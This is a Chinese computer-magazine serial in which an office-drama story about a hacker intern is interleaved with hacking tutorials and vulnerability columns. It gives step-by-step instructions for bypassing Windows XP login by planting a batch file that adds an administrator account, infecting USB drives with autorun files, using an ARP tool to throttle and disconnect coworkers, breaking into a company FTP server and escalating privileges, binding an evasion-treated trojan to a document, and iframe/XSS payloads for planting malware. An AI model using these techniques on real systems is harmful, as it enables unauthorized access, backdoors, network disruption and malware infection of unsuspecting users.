毒辣辣求职记全集（电脑报“黑客营”连载）

efujin

第一节：电脑报第19期 G8版

黑客营

毒辣辣求职记（1）

和诸多大学毕业生一样，毒辣辣面临着就业的巨大压力，但毒辣辣又与普通大学生有所不同，他在大学课余时间学习了黑客技术。这些黑客技术会对他的求职之路产生哪些影响？运用这些黑客技术，毒辣辣能博得领导和同事的好感吗？能顺利入职成为公司正式的一员吗？通过对本系列的阅读，即使你毫无黑客基础，也可以掌握一些简单的黑客工具和黑客技巧，让你成为办公室内的电脑高手。毒辣辣求职记开演了！

连载地址：http://go.shudoo.com/g/hky.htm

初入职场立一功

故事主角：毒辣辣

其他人物：胖哥（老资格的同事） 主任（直接领导）

本期知识点：绕过系统登录验证

故事提要：在某知名公司实习的毒辣辣，第一天就等到了一个表现机会。主任电脑的系统登录密码离奇出错。如何清除系统登录密码呢？如何不用系统光盘，编程绕过了登录验证呢？

初来乍到

我，绰号毒辣辣，因喜好黑客技术、研究病毒得此名。此前，我一直沉迷于研究黑客技术，没有去找工作，可大四毕业的期限越来越近，我不能再等待了，必须爆发自己。我决定先找一家公司实习，力求通过实习期间的表现，增加与公司的双向沟通与了解，充分展现个人价值，最终实现曲线就业的目的。

经过反复筛选和积极联系争取，我如愿以偿地进入了某知名公司实习。第一天上班，我穿上新买的黑色西装，打上鲜红的领带，何等意气风发。在公司的会议室，主任接待了我和其他几名实习员工。

“欢迎你们！我们是一家正规的知名公司，拥有良好的企业文化和传统。你们虽然是实习生，但也要以正式员工的标准严格要求自己，这对你们的成长和进步十分重要。你们之中优秀者，将会在实习期结束时，优先获得成为正式员工的机会……”

主任的话很具有感染力和号召力，让我们几个实习生热血沸腾。身为一名天蝎男，我也难逃内向的命运，在心中琢磨怎么表态时，主任盯着我：“看简历，你计算机技术不错，就到公司的信息中心实习吧！信息中心的胖哥是我们的技术权威，你就先跟他吧，要珍惜机会、虚心学习！”

“我一定好好干，干的好好的！”我中断了琢磨，结结巴巴地回答，老实说，言语表达不是我的强项，不知道会不会影响领导对我的印象，我纠结这个。

表现机会

胖哥是一个体重超过180斤的老员工——据说才进公司的时候只有120斤，稍有秃顶、脸圆圆的、看上去非常憨厚。这个上午，胖哥就让我刻个资料备份光盘，做了一个网线头，虽然这活技术含量不高，但我认认真真的完成了。

       当我以为今天就这么浑浑噩噩地度过时，主任打来了电话：“胖子，我的笔记本电脑系统登录密码出错了（ Windows XP），三点钟要开会，你快过来处理一下。”

情况紧急，胖哥急匆匆赶往主任的办公室，我想了一下也跟了上去。我到主人的办公室时，只听见主任十分着急地说道：“还没有搞定？半个小时后我开会就要用了！”

“找一张系统光盘就可以解决问题。该死，我把系统光盘放哪了，我马上回去找找！”

胖哥有急匆匆离开主任的办公室，我鼓起勇气对主任说：“不用系统光盘，也可以解决这个问题”

“真的？你来试试！”

我的方法是在电脑中新建一个用户，这样不但可以间接清除系统登录密码，还在笔记本电脑中留下了“后门”。迅速做到主任的台式机前，插入随身携带的闪存，然后下载了USBoot（见图），该工具可以把闪存变成一个系统启动盘。

我新建了一个文本文件，在里面输入以下代码：

Net user hh 123/add

Net localgroup administrators hh/add

Exit

代码的意思是创建一个有系统管理员权限的账号，账号名为hh，密码为123。将该文本文件保存为.bat文件，然后利用压缩工具将该文件转化成可自解压的文件（magnify.exe），文件名必须改为magnify。

任务完成

时间一分一秒过去，主任十分焦急：“怎么样，能行么？”

“马上就好，最多5分钟！”我自信满满地答到，虽然我不擅长语言表达，但有的是技术资本。我麻利地将闪存插入主任的笔记本电脑中，设置开机启动顺序为“USB”优先，系统成功进入DOS界面，在DOS界面中输入cd
Windows、cd
system32进入C:\ Windows\ system32，再输入copy E:\ magnify.exe
C:\ Windows\ system32\magnify.exe（E盘就是闪存盘）。

拔出闪存，重启系统，按下组合键“Windows+U”，激活自解压文件，创建新的系统登录账号，输入用户名hh和密码123。伴随着那熟悉的开机登录音乐，系统成功登录到桌面了。

“干得不错！”主任由衷地夸张我。

最后的事情就是删除原账号的密码，这对我来说就是小菜一碟。在清除原登录密码的过程中，我意外地发现笔记本电脑中有一个隐藏的账号，通过日志检查，发现该账号创建已经很长时间了。时间紧迫，我无法深入追究刘主任的登录密码失效是不是有人故意弄的，只好删除了隐藏的账号，却不想这样做无形中得罪了人……

职场新人注意事项

注意事项1：穿着要精神。每个公司企业不一样文化，要求也不一样，有的公司要求上班必须西装革履，有的公司对穿着没有要求，所以事先要做好充分调查。无论有没有要求，穿的精神都是必要的，可以给同事和领导留下好印象。本文中毒辣辣穿西装就是一个不错的选择。

注意事项2：要抓住一切机会表现自己。新人最需要的就是表现自己，让领导迅速的对自己有一个良好的印象，一旦碰到这样的机会，千万要抓住。本文中的毒辣辣就是抓住了表现机会获得了领导的好感。

注意事项3：态度要积极。新人初期的任务多是干一些杂活，难免要为老员工跑跑腿，不要抱怨，认真完成任务，给同事留下一个办事认真负责的好印象正所谓，态度决定一切。本文中的毒辣辣认真干杂活的态度值得肯定。

技术延伸

文章中用闪存绕过系统登录验证的方法并不常见，这样做相当于在别人的电脑中留下了后门，只需要简单的命令就可以远程连接别人的电脑，在里面为所欲为。常见的做法是，使用DOS下清除系统用户密码的工具Password Changer完成密码清除工作。

需要注意的是，直接在DOS界面中删除C:\Windows\system32\config下的SAM密码文件，这种方法适用于Windows 2000系统，不适用于Windows XP系统。如果条件允许的话，最好还是使用番茄花园之类的系统光盘中嵌入的清除密码功能，方便快捷。

交流互动

每期故事中的技术，我们都会在电脑报报官方论坛数动连线（http://www.shudoo.com）安全板块中，邀请黑客营的高手进行深入的挖掘，他们是在什么情况下使用这些黑客技术的，使用过程中可能会出现什么问题，应该如何解决，精彩不容错过！

上期的答案是不需要验证。有上万人通过论坛、邮件、QQ群和手机四条途径参与了竞猜，产生了一批幸运获奖者，获奖名单请登录http://go.shudoo.com/g/hky.htm查询。

技术题目：为什么文件名必须是magnify？

剧情题目：删除隐藏账号会给黑黑产生什么影响（ 附上分析）？

想知道答案，请看黑黑求职记（2）。如果你想到答案了，请到http://go.shudoo.com/g/hky.htm留言或者发邮件到pcw-chendx@vip.sina.com，答对者将有机会获得我们送出的2GB防病毒闪存。

黑暗竞技场

       传说，在云之彼端有一座黑暗竞技场，在竞技场里面可以随意施展黑客技术。每逢虎年，竞技场将打开大门，迎接新的勇士。来吧，来竞技场吧，来一展你的身手吧！在这里，你可以施展黑客技术；在这里，你可以与高手交流。Let’s go!

Chrome挂马漏洞研究

漏洞的危害

本周，我们来研究一下Chrome浏览器挂马漏洞。利用该漏洞可以进行挂马，可以盗取用户的网游、邮箱、QQ、网银等账号和密码。除了挂马外，该漏洞还可以用来安装恶意插件赚取广告费，强迫用户访问黑客指定的网站赚取流量，甚至可以用来恶作剧。

漏洞的原理

Chrome浏览器为什么会出这个漏洞呢？经过电脑报安全团队的研究，发现漏洞产生的原因是Chrome浏览器的Webkit内核阅读器对视频模块检测过滤不严导致的。那该漏洞只有Chrome浏览器才有吗？通过实验，我们发现Opear浏览器也存在此漏洞。

漏洞的利用

我们提供一个简单的利用思路，先进入QQ空间，然后一篇发表日志（图1），http://www.07s1.cz.cc/1.htm网站是特制的页面。

页面中有一段这样的代码：

<html>

<script>alert(/virus loading...../)</script>

</html>

效果就是弹一个弹窗，内容为virus loading.....（图2）。内容可以修改，例如写一个死循环代码，或者嵌入式挂马代码:<iframe src="http://www.07s1.cz.cc/1.htm" width="200" height="500">。

火狐浏览器同样采用Webkit内核，它会不会也有此漏洞呢？这个悬念就留给大家了！大家可以将自己的研究心得发送到电脑报官方论坛数动连线（http://bbs.shudoo.com）安全板块，也可以直接写信与小编交流，来信请发到pcw-chendx@vip.sina.com。每周我们都会挑出幸运者，赠送每人一份奖品。此外，还有机会在报纸上得到推荐。

      

本期奖品

       本期奖品是安天木马防线KEY和USB连接器，奖品由安天提供，价值30元或300X币。

毒辣辣求职记

       看腼腆的实习员工毒辣辣，如何用一些黑客小花招在办公室里面混得风生水起，泡妞、求职两不误！

efujin

黑客营
毒辣辣求职记（2）
和诸多大学毕业生一样，毒辣辣面临着就业的巨大压力，但毒辣辣又与普通大学生有所不同，他在大学课余时间学习了黑客技术。这些黑客技术会对他的求职之路产生哪些影响？运用这些黑客技术，毒辣辣能博得领导和同事的好感吗？能顺利入职成为公司正式的一员吗？通过对本系列的阅读，即使你毫无黑客基础，也可以掌握一些简单的黑客工具和黑客技巧，让你成为办公室里的电脑高手。毒辣辣求职记开演了！
连载地址：http://go.shudoo.com/g/hky.htm

来自身边的冷箭
故事主角：毒辣辣
其他人物：胖哥（老资格的同事） 主任（直接领导）紫衣MM（会计）
本期知识点：感染闪存的代码

故事提要：毒辣辣在成功帮助主任解决登录问题后，大受主任的赏识，主任又交给他一项秘密任务，在执行密码任务的过程中毒辣辣会碰到什么困难？他的任务会圆满完成吗？谁又会在他背后放冷箭呢？

主任的秘密任务
“粉蓝色的领带好像不适合！”毒辣辣照着镜子，整理着西装，犹豫是不是该换一条素一点的领带。他之所以注重外表，并不是去相亲，而是今天10点钟他将去一趟主任办公室——昨天主任嘱咐的。
10点钟，毒辣辣敲门进入主任办公室，摘下眼镜的主任揉着太阳穴正等着他的到来，主任无视毒辣辣精心打扮的衣着，开门见山地下了命令：“我的笔记本电脑系统登录密码出错，感觉非常诡异。我怀疑有人动过我的电脑，电脑技术方面，我不太懂，你来帮我暗中调查一下。”
“说到别的，我还不敢保证，但说到电脑技术，我绝对没有问题！”
“好，这个事情就交给你去办，不要拖，早点给我完成！”
“是，我尽快完成任务！”
“对了，我听说有一种方法可以让别人不能动我的电脑，只有我自己可以动，你顺便也帮我弄弄！”
“方法是多，例如离开电脑时按组合键‘Windows+L’，不过最保险的方法是用制作一个针对笔记本电脑的闪存加密钥匙，只有插上闪存输入才可以使用电脑，你随身携带闪存这样别人就无法使用你的电脑了！”毒辣辣面对技术问题，分析的头头是道，而主任却听得似懂非懂。
“就找你说的办吧，这是我的闪存和笔记本电脑。”主任对毒辣辣的回答很满意，当然也不忘给毒辣辣口头表扬和鼓励，“你技术不错，好好干，小伙子。另外，我让你调查的事情要注意保密，不要让别人知道。”
毒辣辣退出主任的办公室，惊喜之前洋溢在脸上：“主任是多么的信任我，看来我留下了的希望很大了！”

送报表的尴尬
回到自己的座位，胖哥就凑了过来：“毒辣辣，不错啊，这么快就得到主任的栽培，我看好你，前途无量！”毒辣辣不免有点春风得意而又得意忘形：“天生我才必有用，像我这样的金子总是要发光的。”
毒辣辣将闪存插入主任的笔记本电脑，下载工具制作闪存加密钥匙。突然，电话铃声响起，毒辣辣不得不停下手中的工作，接听了电话。“舟舟，你们这个月的报表怎么还没有交上来，马上送过来”一个甜美的女声命令道。
还没有等毒辣辣反应过来，电话就挂了，电话没有来电显示，毒辣辣犯难了：“胖哥，刚才有个女的打电话要舟舟交什么报表，是不是打错了？”胖哥眼珠子转了转，点头道：“你现在的位置以前是舟舟在做，这份报表你交给18楼财务总监。”
“我？”毒辣辣看到胖哥的身材只好认命，拔出闪存去送报表，当他来到18楼才想起忘记问胖哥财务总监在哪间办公室，这层楼有好几间都是财务室，毒辣辣不好意思再去问胖哥，只得一间一间找，碰了一鼻子灰。
“你哪来的？有什么事情找总监吗？”一个紫衣MM问毒辣辣，她就是电话里面的那个女人，毒辣辣连忙说明来意。“这种事情，交给我们就行了，能麻烦总监吗？”紫衣MM翻了翻报表，“报表上周就做好了，为什么现在才交上来？”毒辣辣一无所知，只好尴尬的笑了笑。

谁在暗算
由于走的匆忙，毒辣辣仅带走了闪存，而没有按组合键“Windows+L”锁住笔记本电脑的系统，一个身影趁毒辣辣去送报表的空暇坐到了主任笔记本电脑前，他输入两段代码，open=激活色情小说.bat，copy d:\色情小说\*.*  h:\（h是闪存盘），代码的作用是当闪存插入时，自动拷贝色情小说到闪存中，然后他又输了了一段代码，拷贝色情小说后自动删除该文件。
当毒辣辣送完报表回来后，一肚子委屈，也不好怨谁，只得继续闪存加密钥匙的制作。十分钟后，毒辣辣伸了伸懒腰，长出一口气，终于搞定闪存加密钥匙了。他正准备拔出闪存，突然看到闪存中一个文本文件，记忆中没有这个文件。
毒辣辣打开文件，冷汗直冒，如果自己没有最后的检测，将闪存交给主任，后果不堪设想，为什么闪存中会莫名其妙的多出色情小说？毒辣辣陷于沉思……

职场点评
1.新人要低调
作为一名新人，初入职场一定要低调、谦虚,特别是要小心处置好上司、同事等方方面面的关系，时刻保持稳重,不可得意忘形，更不可仗势欺人。每个单位都有自己的文化传统和工作氛围，人际关系也有很多历史渊源，不了解情况下，不要乱表态，尽量不卷入利益纷争之中。上文中的毒辣辣就是得意忘形，才会被人耍。

2.做事要细心
毒辣辣接听电话时，没有及时询问对方的身份，送报表前没有询问具体是哪间办公室，交给谁，如果他细心一点，就不会有文中那些尴尬的事情发生了。新人初入职场，要“多看、勤问”把每一个细节做扎实、做到位。

技术延伸
感染闪存的方法有很多，本文用的方法是创建一个Autorun文件和批处理文件，当用户进入盘符的时候激活Autorun文件，Autorun文件中又激活批处理文件，批处理文件将批处理将色情小说从硬盘拷到闪存中。这个模式也是闪存病毒常用的，所不同的这里由拷贝病毒变成了拷贝小说。
此外，闪存加密钥匙就是把闪存制成使用电脑的唯一钥匙，使用电脑时，用户把闪存插入电脑就解锁了；不用电脑时，用户将闪存一拨，电脑就锁定了。制作闪存加密钥匙的工具有很多，例如DiskLogon、Proteg Logon等，软件的具体使用方法请登录电脑报官方论坛数动连线安全板块中查看。

交流互动
        每期故事中的技术，我们都会在电脑报官方论坛数动连线（http://www.shudoo.com）安全板块中，邀请黑客营的高手进行深入的挖掘，他们是在什么情况下使用这些黑客技术的，使用过程中可能会出现什么问题，应该如何解决，精彩不容错过！
上期技术题目的答案是magnify是放大镜程序。有上万人通过论坛、邮件、QQ群和手机四条途径参与了竞猜，产生了一批幸运获奖者，获奖名单请登录http://go.shudoo.com/g/hky.htm查询。
技术题目：“Windows+L”锁住系统有PJ方法吗？
剧情题目：毒辣辣知道是谁在暗算自己吗（ 附上分析）？
想知道答案，请看毒辣辣求职记（3）。如果你想到答案了，请到http://go.shudoo.com/g/hky.htm留言或者发邮件到pcw-chendx@vip.sina.com，答对者将有机会获得我们送出的2GB防病毒闪存。
黑客营交流QQ群：63357672，验证码：陈邓新，欢迎大家加入！


黑白配
        黑白配，男生女生配，在他们的电脑安全生活中，在攻与防中，爆笑无处不在。欢迎投稿或者提供创意，有丰厚的奖励等着你，来稿请寄pcw-chendx@vip.sina.com。
插翅难逃



黑暗竞技场
        传说，在云之彼端有一座黑暗竞技场，在竞技场里面可以随意施展黑客技术。每逢虎年，竞技场将打开大门，迎接新的勇士。来吧，来竞技场吧，来一展你的身手吧！在这里，你可以施展黑客技术；在这里，你可以与高手交流。Let’s go!

不久前，大名鼎鼎的动网论坛PHP版本爆出了一个可以被黑客利用跨站漏洞，该跨站漏洞允许黑客窜改正常动网论坛的URL链接。黑客制作一个“中奖信息”之类的钓鱼网页，或者挂马网页，再通过利用这个漏洞嵌入到有漏洞的动网论坛中，就可以欺骗访问该论坛的用户或者让访问该论坛的网友中病毒。
根据电脑报安全团队分析，出现漏洞的原因是因为动网程序对用户提交的变量代码未进行有效的过滤或转换，允许攻击者插入恶意WEB代码。目前已经发现了三处可以利用漏洞的地方。
第一处:http://p.dvbbs.net/boardhelp.php ... p://www.test.com%3E
第二处:http://p.dvbbs.net/forum_savvy.p ... p://www.test.com%3E
第三处:http://p.dvbbs.net/boardstat.php ... p://www.test.com%3E
漏洞的具体利用过程就就留给大家了！大家可以将自己的研究心得发送到电脑报官方论坛数动连线（http://bbs.shudoo.com）安全板块，也可以直接写信与小编交流，来信请发到pcw-chendx@vip.sina.com。每周我们都会挑出幸运者，赠送每人一份奖品。此外，还有机会在报纸上得到推荐。
        本期奖品是安天木马防线KEY和USB连接器，奖品由安天提供，价值30元或300X币。

efujin

黑客营
毒辣辣求职记（3）
毒辣辣初入职场，就帮助主任解决了一个难题而受到表扬，由于他的得意忘形的，导致有人暗算他，想他在主人面前出丑，幸好毒辣辣及时发现色情小说，但是，暗算者会罢手吗？
毒辣辣求职记第三集开演了！
连载地址：http://go.shudoo.com/g/hky.htm

顾此失彼的教训
故事主角：毒辣辣
其他人物：胖哥（老资格的同事）、主任（直接领导）、紫衣MM（会计）
本期知识点：用黑客工具限制占用宽带

故事提要：毒辣辣受到主任的器重，秘密调查隐藏账号背后的黑手，然而涉世未深的毒辣辣却不知道自己已经树下了强敌，在调查过程中，等待毒辣辣的会是什么呢？他的调查过程会一帆风顺吗？

追查隐藏账号
躺在柔软的床上，毒辣辣脑海中又浮现出闪存中出现色情小说一幕，很明显色情小说冲着自己来的，如果色情小说被主任发现，一定会影响自己的前途。到底是谁想整自己？怎么高超的手法一般人可以不会，毒辣辣有一种说不出的滋味——肯定是信息中心内部的人干的。
信息中心除了胖哥，还有两位同事。毒辣辣摇了摇头，阻止自己继续往下想，不能随意猜测同事！昏昏沉沉睡到半夜，毒辣辣突然睁开眼睛，怕了一下额头：“隐藏账号的主人会不会跟暗算自己的是同一个人？公司哪来那么多高手，绝对是同一人！”
放下包袱的毒辣辣，终于进入梦乡。第二天早上，毒辣辣进入办公室就迫不及待地查看记录——在发现隐藏账号后他下意识地保存了安全日志和防火墙记录，安全日志可以查看入侵电脑的用户名（图1），防火墙记录可以查看入侵电脑的IP地址。

安全日志中入侵者的用户名是administrator，看不出是谁的，但是在防火墙记录中找到了入侵者的IP地址。一步大公司对IP地址的管理都较为严格，每个人都对应着唯一的IP地址。
“这下好了，查一下记录就知道谁在用这个IP地址，就知道幕后黑手是谁了！哈哈！”毒辣辣心中既兴奋又担忧。
“胖哥，公司电脑的IP地址是由我们分配和管理吧，有没有记录资料？我想看一看，熟悉一下情况，便于以后工作……”
“哦！嗯！IP地址确实是我们管理，这记录资料……嗯，让我想想放哪里了。”胖哥显然对毒辣辣提出这个要求感到比较意外，说话有点吞吞吐吐，“我找找吧，找到了我传给你……对了，刚才收发室打电话，说快递公司给我送了个包裹，你去帮我取一下……”
此时，信息中心的电话响了……

紫衣MM的请求
“信息中心么……我记得你，你是毒辣辣，你来上一下，我有事情要你帮忙！”
毒辣辣反应过来，电话中请求帮助的是财务室的紫衣MM，不过电话中的口气令他非常不舒服，总感觉盛气凌人，到底去还是不去？毒辣辣犹豫一阵，还是决定上去瞧瞧——万一耽搁了公事就不妙了。
在电梯中，毒辣辣接到胖哥的电话。
“毒辣辣，你在哪里？”
“财务室出了点问题，叫我去一下。”
“这样，你快去快回，我们在大会议室等你。”
一下子这么多事，让初入职场的毒辣辣犯晕，现在怎么办？他想了想，还是按照原定计划来到财务室，紫衣MM在座位上玩着镜子正等着他。
“等你好久了！这段时间有人下载《三国》电视剧，网速好慢，害我的菜都被别人偷没了，你有应对的方法没有？”紫衣MM压低声音，悄悄地问毒辣辣。
上班时间不能玩游戏，偷菜也是禁止的，这个规矩胖哥告诫过自己，可眼前的紫衣MM却如此的大胆，无视公司的规定，还要自己帮助他偷菜，这让毒辣辣有点不知所措，帮还是不帮？
“喂，别发愣，到底有没有方法？”
“方法是有的，不过……”
“不过什么？快说！”
“是这样的，我可以教你用一款黑客工具P2P终结者，想限制谁上网速度就限制谁，P2P终结者是ARP工具，使用的时候会对局域网的网速造成一定的影响，因为……”
“停！停！别解释了，我听不懂，我让你坐，你直接教我用吧！”
毒辣辣做到了紫衣MM电脑前，下载了P2P终结者（http://www.shudoo.com/bzsoft），在软件界面中可以看到局域网内所有电脑的信息（图2），这些电脑用没有用ARP防火墙、下载速度是多少。

点击“启动控制”就可以收集局域网内所有电脑的信息了，毒辣辣在反馈信息中找到了疯狂下载的电脑，然后点击右键，选择“断开选中主机公网”，正在下载电视剧的电脑就不能上网了。
毒辣辣还是比较慎重，不敢让那台电脑一直断网，只是进行了限速设定，最高下载速度不能超过30KB/S。在毒辣辣手把手的教导下，紫衣MM很快就掌握了该工具的使用方法，偷菜那是爽歪歪。
“这软件蛮好玩的，我收下来啦！看不出来，你还有几分本事！”
“你上班偷菜，不怕被逮着？”
“这是我们俩的秘密，不要对别人说！”
“要我保密，你要请我吃饭，不然……”
“好啦好啦！来块巧克力……”

带毒的记录
心情不错的毒辣辣向大会议室走去，在门后碰到主任和胖哥，主任皱着眉头问道：“大家都在忙着准备视频会议，你去哪里了？”此时胖哥接话了：“我让你去取包裹了，怎么人就不见了？包裹还是我取回来的，要不然就影响了这次视频会议。对了，我想起来了，你是不是去了财务室?”
主任没有理会毒辣辣，径直回办公室了。胖哥叹了一口气，拍拍毒辣辣肩膀：“我不是叫你快去快回吗？怎么这么久？算了，下次动作快一点就是。还有，你要的记录我找到了，我传给你”
晕头转向的毒辣辣机械地跟着胖哥回到办公室，呆呆地收下了记录，运行记录简单扫了几眼，发现发现入侵主任笔记本电脑的IP地址是无人使用的空闲地址。如果毒辣辣此时头脑还是清醒的话，他一定可以发现记录不对劲，捆绑在其中的木马逃不过他的眼睛，可惜现在他的脑子乱得很……

职场点评
本期毒辣辣碰到一个工作中的第一个难题，如何统筹处理多个工作任务，追查隐藏账号、去财务室帮助紫衣MM、帮胖哥取包裹这3个任务有轻有重，有的有时间限制，有的没有，所以要有一个安排，才不会出错。面临多项工作时的应急反映能力、综合协调能力、统筹推进能力是职场新人需要重点锻炼和提高的。
在先后次序上，可以把不同任务划分为重要而紧急，重要而不紧急，紧急而不重要，不紧急且不重要四个层次，依次实施，即使出现疏漏和延误，也不会造成大的后果。例如，毒辣辣应该先确认取包裹这个任务的重要性，如果包裹很重要（跟视频会议有关），就要赶快去，如果包裹不重要，晚一点也没有关系。在方式方法上，要善于运用统筹学优化工作步骤，提高工作效率。在工作习惯上，要养成随手记录工作日志的习惯，形成细致、认真和严谨的工作习惯，确保万无一失。

延伸阅读
毒辣辣其实不知道，记录原本是没有捆绑木马的，当胖哥听到毒辣辣的要求后，才决定在记录中动手脚的。胖哥准备好了木马，通过花蝴蝶工具对木马进行了免杀处理，这样木马就可以逃过杀毒软件的查杀。
此后，胖哥调用了木马捆绑器（见图），将记录和木马捆绑在一起，变成一个新的文件，粗看该文件是记录文档，其实里面隐藏了木马。毒辣辣运行记录时，木马就被释放出来，从而导致毒辣辣的电脑被胖哥间接控制了。


交流互动
        每期故事中的技术，我们都会在电脑报报官方论坛数动连线（http://www.shudoo.com）安全板块中，邀请黑客营的高手进行深入的挖掘，他们是在什么情况下使用这些黑客技术的，使用过程中可能会出现什么问题，应该如何解决，精彩不容错过！
上期的答案是不需要验证。有上万人通过论坛、邮件、QQ群和手机四条途径参与了竞猜，产生了一批幸运获奖者，获奖名单请登录http://go.shudoo.com/g/hky.htm查询。
技术题目：P2P终结者的工作原因是什么？
剧情题目：记录中的IP地址为什么是空闲地址（附上分析）？
想知道答案，请看黑黑求职记（4）。如果你想到答案了，请到http://go.shudoo.com/g/hky.htm留言或者发邮件到pcw-chendx@vip.sina.com，答对者将有机会获得我们送出的2GB防病毒闪存。黑客营交流群：63357672，验证码：陈邓新，欢迎加入。

黑白配
        黑白配，男生女生配，在他们的电脑安全生活中，在攻与防中，爆笑无处不在。欢迎投稿或者提供创意，有丰厚的奖励等着你，来稿请寄pcw-chendx@vip.sina.com。
小白的世博梦


黑暗竞技场
        传说，在云之彼端有一座黑暗竞技场，在竞技场里面可以随意施展黑客技术。每逢虎年，竞技场将打开大门，迎接新的勇士。来吧，来竞技场吧，来一展你的身手吧！在这里，你可以施展黑客技术；在这里，你可以与高手交流。Let’s go!

最近，国内较早做.net技术的BBSMAX 论坛爆出登录任意账号漏洞。该漏洞可以让黑客通过构造active 字符串的方式登录论坛任意的账号，黑客登录论坛后可以发表虚假信息、诈骗信息，甚至是发表病毒的链接，可以说漏洞的性质非常严重。导致漏洞出现的关键代码如下：
byte[] buffer3;
    byte[] bytes = Encoding.ASCII.GetBytes("!bbsmax!");
    byte[] rgbIV = Encoding.ASCII.GetBytes("!zzbird!");
    try
    {
        buffer3 = Convert.FromBase64String(data);
    }
    catch
    {
        return null;

完整的代码和漏洞的具体利用方法，请登录论坛查看！大家可以将自己的研究心得发送到电脑报官方论坛数动连线（http://bbs.shudoo.com）安全板块，也可以直接写信与小编交流，来信请发到pcw-chendx@vip.sina.com。每周我们都会挑出幸运者，赠送每人一份奖品。此外，还有机会在报纸上得到推荐。
        本期奖品是安天木马防线KEY和USB连接器，奖品由安天提供，价值30元或300X币。

efujin

黑客营
毒辣辣求职记（4）
毒辣辣初入职场，就得到主任的赏识，接受了主任秘密任务，调查幕后的神秘黑手，调查过程并不顺利，似乎有一只看不见的手在牵制他。毒辣辣与胖哥之间会发生什么？毒辣辣求职记第四集开演了！
连载地址：http://go.shudoo.com/g/hky.htm

  助红颜身陷困境
故事主角：毒辣辣
其他人物：胖哥（老资格的同事）、主任（直接领导）、紫衣MM（会计）、老会计
本期知识点：用黑客工具限制某人占用宽带

故事提要：毒辣辣利用P2P终结者限制了下载流量，讨得美女欢心，却也无意中得罪了下载电视剧的老会计。毒辣辣只能利用自己的黑客技术私下化解危机，但是他的电脑被植入木马，一举一动都被胖哥尽收眼底……

兴师问罪
“IP地址竟然是空闲！看来入侵主任笔记本电脑的人，相当的谨慎，没有留下一丝的痕迹。不过记录资料里面的数据真的是原始数据吗？”毒辣辣琢磨着，“最近一段时间，胖哥似乎总是有意无意的出我洋相、让我难堪，其中必有原因。幕后黑手会不会跟他有关系？我们公司哪来那么多高手？一定是他！或许他的电脑里面就有我想要的答案……”
“毒辣辣，财务室的老会计反映网速最近突然变得很慢，你去看看吧！”胖哥打断了毒辣辣的思索，给他分配了一个任务。
“好，我马上就去！”毒辣辣正准备偷偷扫描胖哥的电脑，不得不终止行动，先去完成工作任务。
看到毒辣辣离去，胖哥面露惋惜:“这么好的戏，却不能跟着去看，哎！”
毒辣辣来到财务室，第一眼就看到了紫衣MM，紫衣MM漂亮的眼睛一眨一眨，似乎在传递某种信号，毒辣辣不太明白其中的含义：“先办正事，再去找她。”
老会计正等着他，口气不善：“这几天上网速度特别慢，我听说是信息中心的人做了限制，你知道是谁吗？”
“有这种事情？我没有听胖哥说起，可能是误会……”
“哼！你帮我解决一下，这个速度太慢了。”
汗水从毒辣辣的额头不断往外冒，他装模作样的在电脑中捣鼓了一阵，眼睛不断的向紫衣MM求助，一会儿，重启电脑后老会计电脑的上网速度恢复了正常。
“你回去跟胖子说说，好好约束一下手下的人，上班时间乱来影响我工作，你们付得起责任吗？”
“……”

暗渡陈仓
逃离财务室的毒辣辣，还没有喘一口气，眼前就蹦出紫衣MM，她压低声音说道：“你没有提到我吧？”
“都是你惹的祸！我敢隐瞒吗？”
“你出卖我……”
“别打别打!我开玩笑的，别当真！”
“现在怎么办？你给我的工具不能再用了，但如果不用网速又非常慢，我可不甘心！”
“上班时候偷菜是不对的，别偷了。”
“那上班时候下载电影就对了？她不过资格老点，不好明着说她……”
毒辣辣一个头有两个大，这个难题不好解决。如果自己不给P2P终结者，就不会有这个麻烦，毒辣辣开始打退堂鼓，想找个理由脱身，不过看到紫衣MM期盼的双眼，道口的话又吞了回去。
“你要偷菜，老会计要下载电视剧，要你们和平共处的确好难。不过，也不是没有方法，如果我办成了，有什么奖励没有？”
“你办好了，我给你一盒巧克力！”
“不行，你要请吃饭”
“行，我请你吃小面！”
“……”
毒辣辣回到自己的座位，在电脑中查看了一下胖哥给自己的工作资料，眼前一亮：“我果然没有记错，真的有一台半闲置的FTP服务器。”原来，公司局域网内一台备用的FTP服务器，它直接跟三层交换机相连，平时就充当一下总务室的打印服务器，工作负荷非常小。
“如果我控制该服务器，就可以利用它来下载电视剧等东东，嘿嘿！”毒辣辣为自己的这个想法而得意。自己没有FTP服务器的管理权限，这件事又不能让胖哥帮忙，只能偷偷的干，于是毒辣辣调出黑客工具，开始了入侵大计。
通过简单的扫描和分析，毒辣辣断定FTP服务器没有禁止Guest账号，且匿名权限为“写入”，看来这台FTP服务器管理不善，还有这样的漏洞。毒辣辣放弃了寻找漏洞入侵的方法，直接通过匿名入侵FTP服务器。
他在“运行”里输入cmd， 接着输入 “ftp 192.168.2.45”，它是FTP服务器的IP地址，然后通过cd命令进入scripts目录，接着上传FTP提权工具，在浏览器中输入http:// 192.168.2.45/scripts/getadmin.exe?iusr_phoenix-r，如果返回CGI Error提示，则表示提权成功，接下来就是创建一个拥有管理员权限的专用账号。
利用该账号，毒辣辣通过FTP软件成功登录了FTP服务器，在服务器里面调用迅雷下载老会计喜欢的电视剧，下载速度比财务室的快得多。如此一来，毒辣辣即获得紫衣MM的欢心，又消除了与老会计的误会，可谓一箭双雕！

胖哥的举报
“小样，技术确实不错，可惜……”毒辣辣入侵FTP服务器的全部过程，胖哥通过木马的屏幕监控功能看得清清楚楚、仔仔细细，并把整个过程录制下来。此外，胖哥还登录了FTP服务器，在安全日志找到了毒辣辣的IP地址和创建的账号。
五点半，正是公司下班时间，一个臃肿的身影幽灵般闪进了主任办公室，拦住了正要下班的主任：“主任，我向你汇报一个事情，新来的员工毒辣辣可真不简单，我怀疑你的笔记本电脑系统登录故障就是他在捣鬼……”
胖哥把毒辣辣擅自使用非法软件扰乱局域网，入侵FTP服务器私自下载电影等行为添油加醋地说了一遍，不失时机地把这些事情上升到目无领导、胡作非为、违反规定的高度，
主任从最初的不信，再到怀疑，最后看到证据后彻底愤怒了……
可怜的毒辣辣，又将面临什么挫折呢？下集不容错过。

职场点评
社会不同于学校，同事有别于同学，本期中毒辣辣的悲剧值得很多职场新手反思。作为职场新人，一定要尽快养成按程序办事，遵守规章制度的习惯，特别是对分工负责、逐级汇报、归口管理、请示汇报等日常的办公规范，要认真遵守，避免不必要的麻烦。更不能凭着一股热情和冲动，违背工作纪律和组织原则，好心办错事。
